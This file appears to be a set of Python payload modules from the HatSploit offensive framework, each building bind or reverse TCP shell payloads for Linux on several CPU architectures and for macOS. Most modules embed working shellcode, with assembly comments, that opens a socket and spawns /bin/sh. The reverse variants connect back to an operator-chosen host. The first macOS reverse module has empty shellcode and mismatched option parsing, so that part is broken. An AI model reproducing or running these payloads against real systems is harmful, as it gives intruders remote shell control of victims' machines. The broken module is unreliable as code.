class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "macOS x64 Shell Reverse TCP",
'Module': "payload/macos/x64/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for macOS x64.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "macho",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(
self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (b"")
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'x64', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "Linux armle Shell Reverse TCP",
'Module': "payload/linux/armle/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for Linux armle.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, file_format, local_file = self.parser.parse_options(
self.options)
local_host = self.payload.host_to_bytes(local_host)
local_port = self.payload.port_to_bytes(local_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x01\x10\x8F\xE2" + b"\x11\xFF\x2F\xE1" + b"\x02\x20\x01\x21" +
b"\x92\x1A\x0F\x02" + b"\x19\x37\x01\xDF" + b"\x06\x1C\x08\xA1" +
b"\x10\x22\x02\x37" + b"\x01\xDF\x3F\x27" + b"\x02\x21\x30\x1c" +
b"\x01\xdf\x01\x39" + b"\xFB\xD5\x05\xA0" + b"\x92\x1a\x05\xb4" +
b"\x69\x46\x0b\x27" + b"\x01\xDF\xC0\x46" + b"\x02\x00" +
local_port + # "\x12\x34" struct sockaddr and port
local_host + # reverse ip address
b"\x2f\x62\x69\x6e" + # /bin
b"\x2f\x73\x68\x00" # /sh\0
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'armle', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
payload = payload()
details = {
'Name': "Linux x64 Shell Bind TCP",
'Module': "payload/linux/x64/shell_bind_tcp",
'Authors': ['enty8080'],
'Description': "Shell Bind TCP Payload for Linux x64.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'BPORT': {
'Description': "Bind port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(
self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x6a\x29" + # pushq $0x29
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x6a\x02" + # pushq $0x2
b"\x5f" + # pop %rdi
b"\x6a\x01" + # pushq $0x1
b"\x5e" + # pop %rsi
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x52" + # push %rdx
b"\xc7\x04\x24\x02\x00" + # movl $0xb3150002,(%rsp)
bind_port + # port
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x6a\x10" + # pushq $0x10
b"\x5a" + # pop %rdx
b"\x6a\x31" + # pushq $0x31
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x6a\x32" + # pushq $0x32
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x48\x31\xf6" + # xor %rsi,%rsi
b"\x6a\x2b" + # pushq $0x2b
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x48\x97" + # xchg %rax,%rdi
b"\x6a\x03" + # pushq $0x3
b"\x5e" + # pop %rsi
b"\x48\xff\xce" + # dec %rsi
b"\x6a\x21" + # pushq $0x21
b"\x58" + # pop %rax
b"\x0f\x05" + # syscall
b"\x75\xf6" + # jne 33 <dup2_loop>
b"\x6a\x3b" + # pushq $0x3b
b"\x58" + # pop %rax
b"\x99" + # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" + #
b"\x53" + # push %rbx
b"\x48\x89\xe7" + # mov %rsp,%rdi
b"\x52" + # push %rdx
b"\x57" + # push %rdi
b"\x48\x89\xe6" + # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'x64', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
payload = payload()
details = {
'Name': "Linux mipsle Shell Bind TCP",
'Module': "payload/linux/mipsle/shell_bind_tcp",
'Authors': [
'enty8080'
],
'Description': "Shell Bind TCP Payload for Linux mipsle.",
'Dependencies': [
''
],
'Comments': [
''
],
'Risk': "low"
}
options = {
'BPORT': {
'Description': "Bind port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\xe0\xff\xbd\x27" + # addiu sp,sp,-32
b"\xfd\xff\x0e\x24" + # li t6,-3
b"\x27\x20\xc0\x01" + # nor a0,t6,zero
b"\x27\x28\xc0\x01" + # nor a1,t6,zero
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
b"\x0c\x01\x01\x01" + # syscall
b"\xff\xff\x50\x30" + # andi s0,v0,0xffff
b"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
b"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
bind_port + b"\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 8888 (default LPORT))
b"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
b"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
b"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
b"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
b"\xe0\xff\xad\xaf" + # sw t5,-32(sp)
b"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
b"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
b"\xec\xff\xa0\xaf" + # sw zero,-20(sp)
b"\x25\x20\x10\x02" + # or a0,s0,s0
b"\xef\xff\x0e\x24" + # li t6,-17
b"\x27\x30\xc0\x01" + # nor a2,t6,zero
b"\xe0\xff\xa5\x23" + # addi a1,sp,-32
b"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A
b"\x0c\x01\x01\x01" + # syscall
b"\x25\x20\x10\x02" + # or a0,s0,s0
b"\x01\x01\x05\x24" + # li a1,257
b"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
b"\x0c\x01\x01\x01" + # syscall
b"\x25\x20\x10\x02" + # or a0,s0,s0
b"\xff\xff\x05\x28" + # slti a1,zero,-1
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
b"\x0c\x01\x01\x01" + # syscall
b"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
b"\xfd\xff\x11\x24" + # li s1,-3
b"\x27\x88\x20\x02" + # nor s1,s1,zero
b"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
b"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
b"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
b"\x0c\x01\x01\x01" + # syscall 0x40404
b"\xff\xff\x10\x24" + # li s0,-1
b"\xff\xff\x31\x22" + # addi s1,s1,-1
b"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
b"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
b"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
b"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
b"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
b"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
b"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
b"\xec\xff\xa4\x27" + # addiu a0,sp,-20
b"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
b"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
b"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
b"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
b"\x0c\x01\x01\x01" # syscall 0x40404
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'mipsle', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
tcp = tcp()
payload = payload()
details = {
'Name': "Linux mipsle Shell Reverse TCP",
'Module': "payload/linux/mipsle/shell_reverse_tcp",
'Authors': ['enty8080'],
'Description': "Shell Reverse TCP Payload for Linux mipsle.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': tcp.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, file_format, local_file = self.parser.parse_options(
self.options)
local_host = self.payload.host_to_bytes(local_host)
local_port = self.payload.port_to_bytes(local_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\xff\xff\x04\x28" + # slti a0,zero,-1
b"\xa6\x0f\x02\x24" + # li v0,4006
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\x11\x11\x04\x28" + # slti a0,zero,4369
b"\xa6\x0f\x02\x24" + # li v0,4006
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xfd\xff\x0c\x24" + # li t4,-3
b"\x27\x20\x80\x01" + # nor a0,t4,zero
b"\xa6\x0f\x02\x24" + # li v0,4006
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xfd\xff\x0c\x24" + # li t4,-3
b"\x27\x20\x80\x01" + # nor a0,t4,zero
b"\x27\x28\x80\x01" + # nor a1,t4,zero
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\x57\x10\x02\x24" + # li v0,4183
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xff\xff\x44\x30" + # andi a0,v0,0xffff
b"\xc9\x0f\x02\x24" + # li v0,4041
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\xc9\x0f\x02\x24" + # li v0,4041
b"\x0c\x09\x09\x01" + # syscall 0x42424
local_port + b"\x05\x3c" + # "\x7a\x69" lui a1,0x697a
b"\x02\x00\xa5\x34" + # ori a1,a1,0x2
b"\xf8\xff\xa5\xaf" + # sw a1,-8(sp)
local_host[2:] + b"\x05\x3c" + # "\x00\x01" lui a1,0x100
local_host[:2] + b"\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f
b"\xfc\xff\xa5\xaf" + # sw a1,-4(sp)
b"\xf8\xff\xa5\x23" + # addi a1,sp,-8
b"\xef\xff\x0c\x24" + # li t4,-17
b"\x27\x30\x80\x01" + # nor a2,t4,zero
b"\x4a\x10\x02\x24" + # li v0,4170
b"\x0c\x09\x09\x01" + # syscall 0x42424
b"\x62\x69\x08\x3c" + # lui t0,0x6962
b"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f
b"\xec\xff\xa8\xaf" + # sw t0,-20(sp)
b"\x73\x68\x08\x3c" + # lui t0,0x6873
b"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e
b"\xf0\xff\xa8\xaf" + # sw t0,-16(sp)
b"\xff\xff\x07\x28" + # slti a3,zero,-1
b"\xf4\xff\xa7\xaf" + # sw a3,-12(sp)
b"\xfc\xff\xa7\xaf" + # sw a3,-4(sp)
b"\xec\xff\xa4\x23" + # addi a0,sp,-20
b"\xec\xff\xa8\x23" + # addi t0,sp,-20
b"\xf8\xff\xa8\xaf" + # sw t0,-8(sp)
b"\xf8\xff\xa5\x23" + # addi a1,sp,-8
b"\xec\xff\xbd\x27" + # addiu sp,sp,-20
b"\xff\xff\x06\x28" + # slti a2,zero,-1
b"\xab\x0f\x02\x24" + # li v0,4011
b"\x0c\x09\x09\x01" # syscall 0x42424
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'mipsle', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
payload = payload()
details = {
'Name': "Linux armle Shell Bind TCP",
'Module': "payload/linux/armle/shell_bind_tcp",
'Authors': [
'enty8080'
],
'Description': "Shell Bind TCP Payload for Linux armle.",
'Dependencies': [
''
],
'Comments': [
''
],
'Risk': "low"
}
options = {
'BPORT': {
'Description': "Bind port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x02\x00\xa0\xe3" +
b"\x01\x10\xa0\xe3" +
b"\x06\x20\xa0\xe3" +
b"\x07\x00\x2d\xe9" +
b"\x01\x00\xa0\xe3" +
b"\x0d\x10\xa0\xe1" +
b"\x66\x00\x90\xef" +
b"\x0c\xd0\x8d\xe2" +
b"\x00\x60\xa0\xe1" +
bind_port[1:2] + b"\x10\xa0\xe3" +
bind_port[0:1] + b"\x70\xa0\xe3" +
b"\x01\x1c\xa0\xe1" +
b"\x07\x18\x81\xe0" +
b"\x02\x10\x81\xe2" +
b"\x02\x20\x42\xe0" +
b"\x06\x00\x2d\xe9" +
b"\x0d\x10\xa0\xe1" +
b"\x10\x20\xa0\xe3" +
b"\x07\x00\x2d\xe9" +
b"\x02\x00\xa0\xe3" +
b"\x0d\x10\xa0\xe1" +
b"\x66\x00\x90\xef" +
b"\x14\xd0\x8d\xe2" +
b"\x06\x00\xa0\xe1" +
b"\x03\x00\x2d\xe9" +
b"\x04\x00\xa0\xe3" +
b"\x0d\x10\xa0\xe1" +
b"\x66\x00\x90\xef" +
b"\x08\xd0\x8d\xe2" +
b"\x06\x00\xa0\xe1" +
b"\x01\x10\x41\xe0" +
b"\x02\x20\x42\xe0" +
b"\x07\x00\x2d\xe9" +
b"\x05\x00\xa0\xe3" +
b"\x0d\x10\xa0\xe1" +
b"\x66\x00\x90\xef" +
b"\x0c\xd0\x8d\xe2" +
b"\x00\x60\xa0\xe1" +
b"\x02\x10\xa0\xe3" +
b"\x06\x00\xa0\xe1" +
b"\x3f\x00\x90\xef" +
b"\x01\x10\x51\xe2" +
b"\xfb\xff\xff\x5a" +
b"\x04\x10\x4d\xe2" +
b"\x02\x20\x42\xe0" +
b"\x2f\x30\xa0\xe3" +
b"\x62\x70\xa0\xe3" +
b"\x07\x34\x83\xe0" +
b"\x69\x70\xa0\xe3" +
b"\x07\x38\x83\xe0" +
b"\x6e\x70\xa0\xe3" +
b"\x07\x3c\x83\xe0" +
b"\x2f\x40\xa0\xe3" +
b"\x73\x70\xa0\xe3" +
b"\x07\x44\x84\xe0" +
b"\x68\x70\xa0\xe3" +
b"\x07\x48\x84\xe0" +
b"\x73\x50\xa0\xe3" +
b"\x68\x70\xa0\xe3" +
b"\x07\x54\x85\xe0" +
b"\x3e\x00\x2d\xe9" +
b"\x08\x00\x8d\xe2" +
b"\x00\x10\x8d\xe2" +
b"\x04\x20\x8d\xe2" +
b"\x0b\x00\x90\xef"
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'armle', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
payload = payload()
details = {
'Name': "Linux mipsbe Shell Bind TCP",
'Module': "payload/linux/mipsbe/shell_bind_tcp",
'Authors': [
'enty8080'
],
'Description': "Shell Bind TCP Payload for Linux mipsbe.",
'Dependencies': [
''
],
'Comments': [
''
],
'Risk': "low"
}
options = {
'BPORT': {
'Description': "Bind port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
b"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
b"\x24\x0e\xff\xfd" + # li t6,-3
b"\x01\xc0\x20\x27" + # nor a0,t6,zero
b"\x01\xc0\x28\x27" + # nor a1,t6,zero
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
b"\x01\x01\x01\x0c" + # syscall
# bind(3, {sa_family=AF_INET, sin_port=htons(8888), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
b"\x30\x50\xff\xff" + # andi s0,v0,0xffff
b"\x24\x0e\xff\xef" + # li t6,-17 ; t6: 0xffffffef
b"\x01\xc0\x70\x27" + # nor t6,t6,zero ; t6: 0x10 (16)
b"\x24\x0d\xff\xfd" + # li t5,-3 ; t5: -3
b"\x01\xa0\x68\x27" + # nor t5,t5,zero ; t5: 0x2
b"\x01\xcd\x68\x04" + # sllv t5,t5,t6 ; t5: 0x00020000
b"\x24\x0e" + bind_port + # li t6,0xFFFF (port) ; t6: 0x115c (8888 (default LPORT))
b"\x01\xae\x68\x25" + # or t5,t5,t6 ; t5: 0x0002115c
b"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
b"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
b"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
b"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x24\x0e\xff\xef" + # li t6,-17
b"\x01\xc0\x30\x27" + # nor a2,t6,zero
b"\x23\xa5\xff\xe0" + # addi a1,sp,-32
b"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
b"\x01\x01\x01\x0c" + # syscall
# listen(3, 257) = 0
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x24\x05\x01\x01" + # li a1,257
b"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
b"\x01\x01\x01\x0c" + # syscall
# accept(3, 0, NULL) = 4
b"\x02\x10\x20\x25" + # or a0,s0,s0
b"\x28\x05\xff\xff" + # slti a1,zero,-1
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
b"\x01\x01\x01\x0c" + # syscall
# dup2(4, 2) = 2
# dup2(4, 1) = 1
# dup2(4, 0) = 0
b"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
b"\x24\x11\xff\xfd" + # li s1,-3
b"\x02\x20\x88\x27" + # nor s1,s1,zero
b"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
b"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
b"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
b"\x01\x01\x01\x0c" + # syscall 0x40404
b"\x24\x10\xff\xff" + # li s0,-1
b"\x22\x31\xff\xff" + # addi s1,s1,-1
b"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
b"\x28\x06\xff\xff" + # slti a2,zero,-1
b"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
b"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
b"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
b"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
b"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
b"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
b"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
b"\x27\xa4\xff\xec" + # addiu a0,sp,-20
b"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
b"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
b"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
b"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
b"\x01\x01\x01\x0c" # syscall 0x40404
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'mipsbe', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
payload = payload()
details = {
'Name': "Linux x86 Shell Bind TCP",
'Module': "payload/linux/x86/shell_bind_tcp",
'Authors': ['enty8080'],
'Description': "Shell Bind TCP Payload for Linux x86.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'BPORT': {
'Description': "Bind port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "elf",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(
self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x31\xdb" + # xorl %ebx,%ebx
b"\xf7\xe3" + # mull %ebx
b"\x53" + # pushl %ebx
b"\x43" + # incl %ebx
b"\x53" + # pushl %ebx
b"\x6a\x02" + # pushl $0x02
b"\x89\xe1" + # movl %esp,%ecx
b"\xb0\x66" + # movb $0x66,%al
b"\xcd\x80" + # int $0x80
b"\x5b" + # popl %ebx
b"\x5e" + # popl %esi
b"\x52" + # pushl %edx
b"\x68\x02\x00" + bind_port + # pushl port
b"\x6a\x10" + # pushl $0x10
b"\x51" + # pushl %ecx
b"\x50" + # pushl %eax
b"\x89\xe1" + # movl %esp,%ecx
b"\x6a\x66" + # pushl $0x66
b"\x58" + # popl %eax
b"\xcd\x80" + # int $0x80
b"\x89\x41\x04" + # movl %eax,0x04(%ecx)
b"\xb3\x04" + # movb $0x04,%bl
b"\xb0\x66" + # movb $0x66,%al
b"\xcd\x80" + # int $0x80
b"\x43" + # incl %ebx
b"\xb0\x66" + # movb $0x66,%al
b"\xcd\x80" + # int $0x80
b"\x93" + # xchgl %eax,%ebx
b"\x59" + # popl %ecx
b"\x6a\x3f" + # pushl $0x3f
b"\x58" + # popl %eax
b"\xcd\x80" + # int $0x80
b"\x49" + # decl %ecx
b"\x79\xf8" + # jns <bndsockcode+50>
b"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f
b"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f
b"\x89\xe3" + # movl %esp,%ebx
b"\x50" + # pushl %eax
b"\x53" + # pushl %ebx
b"\x89\xe1" + # movl %esp,%ecx
b"\xb0\x0b" + # movb $0x0b,%al
b"\xcd\x80" # int $0x80
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'x86', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule):
payload = payload()
details = {
'Name': "macOS x64 Shell Bind TCP",
'Module': "payload/macos/x64/shell_bind_tcp",
'Authors': ['enty8080'],
'Description': "Shell Bind TCP Payload for macOS x64.",
'Dependencies': [''],
'Comments': [''],
'Risk': "low"
}
options = {
'BPORT': {
'Description': "Bind port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Output format.",
'Value': "macho",
'Type': None,
'Required': True
},
'LPATH': {
'Description': "Local path.",
'Value': "/tmp/payload.bin",
'Type': None,
'Required': True
}
}
def run(self):
bind_port, file_format, local_file = self.parser.parse_options(
self.options)
bind_port = self.payload.port_to_bytes(bind_port)
if not file_format in self.payload.formats.keys():
self.badges.output_error("Invalid format!")
return
self.badges.output_process("Generating shellcode...")
shellcode = (
b"\x48\x31\xff" + # xorq %rdi, %rdi
b"\x40\xb7\x02" + # movb $2, %dil
b"\x48\x31\xf6" + # xorq %rsi, %rsi
b"\x40\xb6\x01" + # movb $1, %sil
b"\x48\x31\xd2" + # xorq %rdx, %rdx
b"\x48\x31\xc0" + # xorq %rax, %rax
b"\xb0\x02" + # movb $2, %al
b"\x48\xc1\xc8\x28" + # rorq $40, %rax
b"\xb0\x61" + # movb $97, %al
b"\x49\x89\xc4" + # movq %rax, %r12
b"\x0f\x05" + # syscall
b"\x49\x89\xc1" + # movq %rax, %r9
b"\x48\x89\xc7" + # movq %rax, %rdi
b"\x48\x31\xf6" + # xorq %rsi, %rsi
b"\x56" + # pushq %rsi
b"\xbe\x01\x02" + # movl port, %esi
bind_port + # port
b"\x83\xee\x01" + # subl $1, %esi
b"\x56" + # pushq %rsi
b"\x48\x89\xe6" + # movq %rsp, %rsi
b"\xb2\x10" + # movb $16, %dl
b"\x41\x80\xc4\x07" + # addb $7, %r12b
b"\x4c\x89\xe0" + # movq %r12, %rax
b"\x0f\x05" + # syscall
b"\x48\x31\xf6" + # xorq %rsi, %rsi
b"\x48\xff\xc6" + # incq %rsi
b"\x41\x80\xc4\x02" + # addb $2, %r12b
b"\x4c\x89\xe0" + # movq %r12, %rax
b"\x0f\x05" + # syscall
b"\x48\x31\xf6" + # xorq %rsi, %rsi
b"\x41\x80\xec\x4c" + # subb $76, %r12b
b"\x4c\x89\xe0" + # movq %r12, %rax
b"\x0f\x05" + # syscall
b"\x48\x89\xc7" + # movq %rax, %rdi
b"\x48\x31\xf6" + # xorq %rsi, %rsi
b"\x41\x80\xc4\x3c" + # addb $60, %r12b
b"\x4c\x89\xe0" + # movq %r12, %rax
b"\x0f\x05" + # syscall
b"\x48\xff\xc6" + # incq %rsi
b"\x4c\x89\xe0" + # movq %r12, %rax
b"\x0f\x05" + # syscall
b"\x48\x31\xf6" + # xorq %rsi, %rsi
b"\x56" + # pushq %rsi
b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
+ # movabsq $7526411553527181103, %rdi
b"\x57" + # pushq %rdi
b"\x48\x89\xe7" + # movq %rsp, %rdi
b"\x48\x31\xd2" + # xorq %rdx, %rdx
b"\x41\x80\xec\x1f" + # subb $31, %r12b
b"\x4c\x89\xe0" + # movq %r12, %rax
b"\x0f\x05" # syscall
)
self.badges.output_process("Generating payload...")
payload = self.payload.generate(file_format, 'x64', shellcode)
self.badges.output_process("Saving to " + local_file + "...")
with open(local_file, 'wb') as f:
f.write(payload)
self.badges.output_success("Successfully saved to " + local_file + "!")